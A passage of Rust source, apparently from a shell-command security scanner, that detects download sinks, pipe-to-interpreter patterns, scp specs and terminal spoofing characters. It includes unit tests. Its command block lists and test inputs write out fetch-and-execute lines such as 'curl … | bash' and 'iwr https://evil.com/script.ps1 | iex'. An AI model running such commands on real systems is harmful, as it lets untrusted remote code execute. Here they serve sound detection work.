        let preceded_by_ws_or_start =
            abs == 0 || matches!(bytes.get(abs - 1), Some(b) if b.is_ascii_whitespace());
        let followed_by_ws_or_end = abs + n == bytes.len()
            || matches!(bytes.get(abs + n), Some(b) if b.is_ascii_whitespace());
        if preceded_by_ws_or_start && followed_by_ws_or_end {
            return Some(abs);
        }
        // Advance by one full character (not one byte) so the next slice
        // start stays on a char boundary.
        let step = haystack[abs..].chars().next().map_or(1, char::len_utf8);
        search_from = abs + step;
    }
    None
}
1063
1064fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
1066 if let Some(cmd) = resolve_segment_command(segment) {
1067 let cmd_lower = cmd.name;
1068 if cmd_lower == "git" {
1070 return is_git_sink(cmd.args);
1071 }
1072 if is_source_command(&cmd_lower) {
1073 return true;
1074 }
1075 }
1076
1077 if let Some(sep) = &segment.preceding_separator {
1079 if sep == "|" || sep == "|&" {
1080 if let Some(cmd) = resolve_segment_command(segment) {
1082 if is_interpreter(&cmd.name) {
1083 return true;
1084 }
1085 }
1086 }
1087 }
1088
1089 false
1090}
1091
/// Commands that fetch or consume remote content (downloaders, HTTP clients,
/// remote copy tools, container runtimes, package managers, and tirith's own
/// run wrapper); their arguments are treated as URL sinks.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "http",
        "https",
        "xh",
        "fetch",
        "scp",
        "rsync",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
        "tirith-run",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
1121
/// A parsed scp/rsync remote location: `[user@]host:path`.
pub struct ScpRemoteSpec {
    /// User portion before `@`, when present.
    pub user: Option<String>,
    /// Remote host name.
    pub host: String,
    /// Path after the colon; empty when no colon/path was given.
    pub path: String,
}
1140
/// Parses an scp/rsync remote spec (`[user@]host:path`) out of `arg`.
///
/// Returns `None` for flags, scheme URLs (`host://...`), specs whose colon is
/// immediately preceded by `/` (the colon then belongs to a path), invalid
/// host names, and — on Windows shells — single-letter "hosts" that are
/// really drive letters (`C:\...`, and `C:/...` under PowerShell/cmd).
pub fn parse_scp_remote_spec(arg: &str, shell: ShellType) -> Option<ScpRemoteSpec> {
    if arg.is_empty() || arg.starts_with('-') || arg.contains("://") {
        return None;
    }

    // `user@host[:path]` form.
    if let Some(at_pos) = arg.find('@') {
        let before_at = &arg[..at_pos];
        let after_at = &arg[at_pos + 1..];
        if before_at.is_empty() || after_at.is_empty() || before_at.contains(':') {
            return None;
        }
        let (host, path) = match after_at.find(':') {
            Some(colon_pos) => {
                // A '/' right before the colon means the colon sits inside a
                // path component, not between host and path.
                if colon_pos > 0 && after_at.as_bytes()[colon_pos - 1] == b'/' {
                    return None;
                }
                (
                    &after_at[..colon_pos],
                    after_at[colon_pos + 1..].to_string(),
                )
            }
            None => (after_at, String::new()),
        };
        if !is_valid_scp_host(host) {
            return None;
        }
        return Some(ScpRemoteSpec {
            user: Some(before_at.to_string()),
            host: host.to_string(),
            path,
        });
    }

    // `host:path` form — a colon is mandatory here.
    let colon_pos = arg.find(':')?;
    if colon_pos > 0 && arg.as_bytes()[colon_pos - 1] == b'/' {
        return None;
    }
    let host = &arg[..colon_pos];
    let after_colon = &arg[colon_pos + 1..];
    if !is_valid_scp_host(host) {
        return None;
    }

    // Single-letter host: likely a Windows drive letter, not a remote.
    if host.len() == 1 && host.chars().next().unwrap().is_ascii_alphabetic() {
        let first_after = after_colon.chars().next();
        match first_after {
            Some('\\') => return None,
            Some('/') if matches!(shell, ShellType::PowerShell | ShellType::Cmd) => {
                return None;
            }
            _ => {}
        }
    }

    Some(ScpRemoteSpec {
        user: None,
        host: host.to_string(),
        path: after_colon.to_string(),
    })
}
1227
/// Validates a hostname in an scp spec: non-empty, no path (`/`) or port
/// (`:`) separators, and only ASCII alphanumerics plus `.`, `_`, `-`.
fn is_valid_scp_host(host: &str) -> bool {
    if host.is_empty() || host.contains('/') || host.contains(':') {
        return false;
    }
    host.chars()
        .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '_' || c == '-')
}
1236
1237fn is_git_sink(args: &[String]) -> bool {
1240 if args.is_empty() {
1241 return false;
1242 }
1243 for arg in args {
1245 let clean = strip_quotes(arg);
1246 if clean.starts_with('-') {
1247 continue;
1248 }
1249 return matches!(
1250 clean.as_str(),
1251 "clone" | "fetch" | "pull" | "submodule" | "remote"
1252 );
1253 }
1254 false
1255}
1256
/// Commands that execute whatever is piped into them (shells, scripting
/// language interpreters, PowerShell's Invoke-Expression).
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
1274
1275fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
1279 let cmd_lower = cmd.to_lowercase();
1280 let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
1281
1282 match cmd_base {
1283 "curl" => {
1284 if arg_index > 0 {
1285 let prev = strip_quotes(&args[arg_index - 1]);
1286 if prev == "-o"
1287 || prev == "--output"
1288 || prev == "-u"
1289 || prev == "--user"
1290 || prev == "-U"
1291 || prev == "--proxy-user"
1292 {
1293 return true;
1294 }
1295 }
1296 let current = strip_quotes(&args[arg_index]);
1297 if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
1298 return true;
1299 }
1300 if current.starts_with("--output=")
1301 || current.starts_with("--user=")
1302 || current.starts_with("--proxy-user=")
1303 {
1304 return true;
1305 }
1306 false
1307 }
1308 "wget" => {
1309 if arg_index > 0 {
1310 let prev = strip_quotes(&args[arg_index - 1]);
1311 if prev == "-O"
1312 || prev == "--output-document"
1313 || prev == "--user"
1314 || prev == "--password"
1315 || prev == "--http-user"
1316 || prev == "--http-password"
1317 || prev == "--ftp-user"
1318 || prev == "--ftp-password"
1319 || prev == "--proxy-user"
1320 || prev == "--proxy-password"
1321 {
1322 return true;
1323 }
1324 }
1325 let current = strip_quotes(&args[arg_index]);
1326 if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
1327 return true;
1328 }
1329 if current.starts_with("--output-document=")
1330 || current.starts_with("--user=")
1331 || current.starts_with("--password=")
1332 || current.starts_with("--http-user=")
1333 || current.starts_with("--http-password=")
1334 || current.starts_with("--ftp-user=")
1335 || current.starts_with("--ftp-password=")
1336 || current.starts_with("--proxy-user=")
1337 || current.starts_with("--proxy-password=")
1338 {
1339 return true;
1340 }
1341 false
1342 }
1343 "http" | "https" | "xh" => {
1344 if arg_index > 0 {
1345 let prev = strip_quotes(&args[arg_index - 1]);
1346 if prev == "-a" || prev == "--auth" {
1347 return true;
1348 }
1349 }
1350 let current = strip_quotes(&args[arg_index]);
1351 if current.starts_with("--auth=") {
1352 return true;
1353 }
1354 false
1355 }
1356 _ => false,
1357 }
1358}
1359
/// Trims surrounding whitespace and removes one matching pair of single or
/// double quotes, when the token is fully wrapped in them.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    let bytes = trimmed.as_bytes();
    let wrapped = bytes.len() >= 2
        && (bytes[0] == b'"' || bytes[0] == b'\'')
        && bytes[bytes.len() - 1] == bytes[0];
    if wrapped {
        trimmed[1..trimmed.len() - 1].to_string()
    } else {
        trimmed.to_string()
    }
}
1370
/// Heuristic: does `s` look like a bare `host.tld[/path]` with no scheme?
///
/// Rejects flags, dot-leading tokens, dotless hosts, and — when there is no
/// meaningful path — tokens ending in a known file extension (those are
/// almost certainly local filenames). Finally requires at least two labels
/// and a 2-63 letter purely-alphabetic TLD.
fn looks_like_schemeless_host(s: &str) -> bool {
    if s.starts_with('-') || !s.contains('.') {
        return false;
    }
    if s.starts_with('.') {
        return false;
    }
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }
    let host_lower = host_part.to_lowercase();
    // A non-trivial path after the host ("host.tld/x") is strong evidence of
    // a URL; nothing or a bare "/" is not.
    let has_meaningful_path = s.find('/').is_some_and(|idx| {
        let after_slash = &s[idx + 1..];
        !after_slash.is_empty() && after_slash != "/"
    });
    if !has_meaningful_path {
        // Without a path, skip anything that ends like a filename.
        let file_exts = [
            ".sh",
            ".py",
            ".rb",
            ".js",
            ".ts",
            ".go",
            ".rs",
            ".c",
            ".h",
            ".txt",
            ".md",
            ".json",
            ".yaml",
            ".yml",
            ".xml",
            ".html",
            ".css",
            ".tar.gz",
            ".tar.bz2",
            ".tar.xz",
            ".tgz",
            ".zip",
            ".gz",
            ".bz2",
            ".rpm",
            ".deb",
            ".pkg",
            ".dmg",
            ".exe",
            ".msi",
            ".dll",
            ".so",
            ".log",
            ".conf",
            ".cfg",
            ".ini",
            ".toml",
            ".png",
            ".jpg",
            ".jpeg",
            ".gif",
            ".bmp",
            ".ico",
            ".tiff",
            ".tif",
            ".pdf",
            ".csv",
            ".mp3",
            ".mp4",
            ".wav",
            ".avi",
            ".mkv",
            ".flac",
            ".ogg",
            ".webm",
            ".ttf",
            ".otf",
            ".woff",
            ".woff2",
            ".docx",
            ".xlsx",
            ".pptx",
            ".sqlite",
            ".lock",
            ".example",
            ".local",
            ".bak",
            ".tmp",
            ".swp",
            ".orig",
            ".patch",
            ".diff",
            ".map",
            ".env",
            ".sample",
            ".dist",
            ".editorconfig",
        ];
        if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
            return false;
        }
    }
    let labels: Vec<&str> = host_part.split('.').collect();
    if labels.len() < 2 {
        return false;
    }
    let tld = labels.last().unwrap();
    tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
}
1488
/// Host portion of a schemeless token: everything before the first `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.find('/') {
        Some(idx) => s[..idx].to_string(),
        None => s.to_string(),
    }
}
1492
/// Path portion of a schemeless token: the first `/` and everything after it,
/// or empty when there is no slash.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |idx| s[idx..].to_string())
}
1500
// Unit tests for this module's scanning and extraction entry points:
// tier-1 regex prefiltering, raw-byte scanning, URL/docker/scp extraction,
// and the schemeless-host heuristics.
#[cfg(test)]
mod tests {
    use super::*;

    // --- tier1_scan: generated regex prefilter, Exec vs Paste contexts ---

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!tier1_scan("ls -la", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
    }

    // Piping into a shell (directly, via sudo/env, or by absolute path)
    // must trip the exec-context prefilter.
    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(tier1_scan("something | bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(tier1_scan("something | env bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(tier1_scan(
            "git clone git@github.com:user/repo",
            ScanContext::Exec
        ));
    }

    // Punycode (xn--) hosts are a homograph-attack vector and must match.
    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(tier1_scan(
            "curl https://xn--example-cua.com",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(tier1_scan(
            "iwr https://evil.com/script.ps1",
            ScanContext::Exec
        ));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(tier1_scan(
            "curl https://example.com/install.sh",
            ScanContext::Exec
        ));
    }

    // ".zip" is both a file extension and a real TLD; the prefilter errs
    // toward matching so later tiers can decide.
    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }

    // Paste context additionally flags non-ASCII input; Exec does not.
    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // --- scan_bytes: ANSI escapes, control chars, bidi, zero-width ---

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    // U+202E RIGHT-TO-LEFT OVERRIDE — classic filename/text spoofing char.
    #[test]
    fn test_byte_scan_bidi() {
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }

    // U+200B ZERO WIDTH SPACE.
    #[test]
    fn test_byte_scan_zero_width() {
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // --- extract_urls: URL extraction and sink-context tracking ---

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_from_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL=https://example.com/install.sh curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
            "leading env assignment URL should be extracted in sink context"
        );
    }

    #[test]
    fn test_extract_urls_from_quoted_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL='https://example.com/install.sh' curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh"),
            "quoted leading env assignment URL should be extracted"
        );
    }

    // HTTP_PROXY-style assignments configure transport, not a destination.
    #[test]
    fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
        let urls = extract_urls(
            "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
            ShellType::Posix,
        );
        assert!(
            !urls.iter().any(|u| u.raw == "http://proxy:8080"),
            "proxy configuration URLs should not be treated as destinations"
        );
    }

    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // Wrapper commands (env/command/time) must not strip sink context
    // from the command they wrap.
    #[test]
    fn test_wrapper_preserves_sink_context() {
        let urls = extract_urls(
            "env --ignore-environment curl http://example.com",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "wrapped sink commands should keep sink context"
        );
    }

    #[test]
    fn test_env_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "env wrapper should preserve tirith run sink context"
        );
    }

    #[test]
    fn test_command_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "command wrapper should preserve tirith run sink context"
        );
    }

    #[test]
    fn test_time_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "time wrapper should preserve tirith run sink context"
        );
    }

    // --- strip_quotes edge cases ---

    // A lone quote character is not a quoted string; it passes through.
    #[test]
    fn test_strip_quotes_single_char() {
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    // --- scan_bytes: additional control-byte and escape-sequence coverage ---

    // BEL (0x07), VT (0x0B), FF (0x0C), DEL (0x7F) all count as control chars.
    #[test]
    fn test_scan_bytes_bel_vt_del() {
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    // OSC (ESC ]), APC (ESC _), and DCS (ESC P) sequences count as ANSI escapes.
    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    // --- looks_like_schemeless_host / segment bookkeeping ---

    #[test]
    fn test_schemeless_long_tld() {
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        for url in &urls {
            assert!(url.segment_index <= 1);
        }
    }

    // --- docker reference extraction ---

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    #[test]
    fn test_docker_run_image_after_double_dash() {
        let urls = extract_urls(
            "docker run --rm -- evil.registry/ns/img:1",
            ShellType::Posix,
        );
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
        assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
    }

    // --- generated tier-1 tables: sanity-check build-script output ---

    #[test]
    fn test_tier1_module_boundary_enforcement() {
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }

    // --- scan_bytes: CR handling — benign line endings vs. embedded \r ---

    #[test]
    fn test_scan_bytes_trailing_cr_not_flagged() {
        let result = scan_bytes(b"/path\r");
        assert!(
            !result.has_control_chars,
            "trailing \\r should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_trailing_crlf_not_flagged() {
        let result = scan_bytes(b"/path\r\n");
        assert!(
            !result.has_control_chars,
            "trailing \\r\\n should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_windows_multiline_not_flagged() {
        let result = scan_bytes(b"line1\r\nline2\r\n");
        assert!(
            !result.has_control_chars,
            "Windows \\r\\n line endings should not be flagged"
        );
    }

    // A \r not followed by \n can overwrite displayed text — must flag.
    #[test]
    fn test_scan_bytes_embedded_cr_still_flagged() {
        let result = scan_bytes(b"safe\rmalicious");
        assert!(
            result.has_control_chars,
            "embedded \\r before non-\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
        assert!(
            result.has_control_chars,
            "attack \\r mixed with \\r\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_only_cr() {
        let result = scan_bytes(b"\r");
        assert!(
            !result.has_control_chars,
            "lone trailing \\r should not be flagged"
        );
    }

    // --- schemeless detection: output-file flags must not look like hosts ---

    #[test]
    fn test_schemeless_skip_curl_output_flag() {
        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "lenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_curl_output_combined() {
        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-olenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_output_flag() {
        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "output.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_combined() {
        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-Ooutput.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_real_domain_still_detected() {
        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.com/payload should be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_user_at_host_detected_in_sink_context() {
        let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert_eq!(schemeless.len(), 1);
        assert_eq!(schemeless[0].raw, "user@bit.ly");
    }

    // --- scp/rsync remote specs: parsed as Scp, never as schemeless URLs ---

    #[test]
    fn test_scp_user_at_host_not_treated_as_schemeless_url() {
        let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(schemeless.is_empty());
    }

    // Test helper: does any extracted URL classify as SchemelessHostPath?
    fn scp_has_schemeless(cmd: &str, shell: ShellType) -> bool {
        extract_urls(cmd, shell)
            .iter()
            .any(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
    }

    #[test]
    fn test_scp_plain_host_path_not_schemeless() {
        assert!(!scp_has_schemeless(
            "scp test.asdf testhost:/home/user/",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_scp_plain_host_relative_path_not_schemeless() {
        assert!(!scp_has_schemeless(
            "scp file.txt host:dir/",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_rsync_plain_host_path_not_schemeless() {
        assert!(!scp_has_schemeless(
            "rsync -av src host:/dest/",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_scp_one_letter_alias_posix_accepted() {
        assert!(!scp_has_schemeless("scp file x:/tmp/", ShellType::Posix));
    }

    // --- parse_scp_remote_spec: drive letters, schemes, flags, field split ---

    // Backslash paths are Windows-local in every shell, never a remote spec.
    #[test]
    fn test_scp_windows_backslash_always_rejected() {
        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Posix).is_none());
        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::PowerShell).is_none());
        assert!(parse_scp_remote_spec("C:\\Users\\me\\file", ShellType::Cmd).is_none());
        assert!(parse_scp_remote_spec("D:\\backup", ShellType::Posix).is_none());
    }

    // "C:/..." is a local drive path only on Windows shells; on POSIX-like
    // shells it is treated as host "C" with path "/...".
    #[test]
    fn test_scp_windows_forward_slash_shell_scoped() {
        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::PowerShell).is_none());
        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Cmd).is_none());
        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Posix).is_some());
        assert!(parse_scp_remote_spec("C:/Users/me/file", ShellType::Fish).is_some());
    }

    // "C:foo" (no slash after the colon) is ambiguous; accepted as a remote
    // spec in all shells.
    #[test]
    fn test_scp_windows_ambiguous_drive_letter_accepted() {
        for shell in [
            ShellType::Posix,
            ShellType::Fish,
            ShellType::PowerShell,
            ShellType::Cmd,
        ] {
            assert!(
                parse_scp_remote_spec("C:foo", shell).is_some(),
                "C:foo should parse as remote in shell {shell:?}"
            );
            assert!(
                parse_scp_remote_spec("D:backup/x.txt", shell).is_some(),
                "D:backup/x.txt should parse as remote in shell {shell:?}"
            );
        }
    }

    #[test]
    fn test_scp_rejects_url_scheme() {
        assert!(parse_scp_remote_spec("http://evil.com/a.sh", ShellType::Posix).is_none());
        assert!(parse_scp_remote_spec("https://a.b/c", ShellType::Posix).is_none());
    }

    #[test]
    fn test_scp_rejects_flag_and_absolute_local() {
        assert!(parse_scp_remote_spec("-P", ShellType::Posix).is_none());
        assert!(parse_scp_remote_spec("--port=22", ShellType::Posix).is_none());
        assert!(parse_scp_remote_spec("/tmp:weird", ShellType::Posix).is_none());
    }

    #[test]
    fn test_scp_accepts_user_at_host_forms() {
        assert!(parse_scp_remote_spec("user@server.com:file.txt", ShellType::Posix).is_some());
        assert!(parse_scp_remote_spec("user@host:/path", ShellType::Posix).is_some());
    }

    // Empty host or empty user components must be rejected.
    #[test]
    fn test_scp_rejects_missing_parts() {
        assert!(parse_scp_remote_spec("", ShellType::Posix).is_none());
        assert!(parse_scp_remote_spec(":path", ShellType::Posix).is_none()); assert!(parse_scp_remote_spec("@host:path", ShellType::Posix).is_none()); assert!(parse_scp_remote_spec("user@:path", ShellType::Posix).is_none());
    }

    #[test]
    fn test_scp_rejects_host_with_slash() {
        assert!(parse_scp_remote_spec("foo/bar:baz", ShellType::Posix).is_none());
    }

    #[test]
    fn test_parse_scp_remote_spec_fields_populated() {
        let spec = parse_scp_remote_spec("user@server.com:/path", ShellType::Posix).unwrap();
        assert_eq!(spec.user.as_deref(), Some("user"));
        assert_eq!(spec.host, "server.com");
        assert_eq!(spec.path, "/path");

        let spec = parse_scp_remote_spec("host:/dest/", ShellType::Posix).unwrap();
        assert_eq!(spec.user, None);
        assert_eq!(spec.host, "host");
        assert_eq!(spec.path, "/dest/");
    }

    // --- TLD/file-extension overlap: a path component tips the decision ---

    #[test]
    fn test_schemeless_png_no_slash_is_file() {
        assert!(!looks_like_schemeless_host("lenna.png"));
    }

    #[test]
    fn test_schemeless_tld_overlap_with_path_is_domain() {
        assert!(looks_like_schemeless_host("evil.zip/payload"));
        assert!(looks_like_schemeless_host("evil.sh/payload"));
    }

    #[test]
    fn test_schemeless_tld_overlap_without_path_is_file() {
        assert!(!looks_like_schemeless_host("lenna.zip"));
        assert!(!looks_like_schemeless_host("script.sh"));
    }

    #[test]
    fn test_schemeless_tld_overlap_sink_context_detected() {
        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.zip/payload should be detected as schemeless URL in sink context"
        );
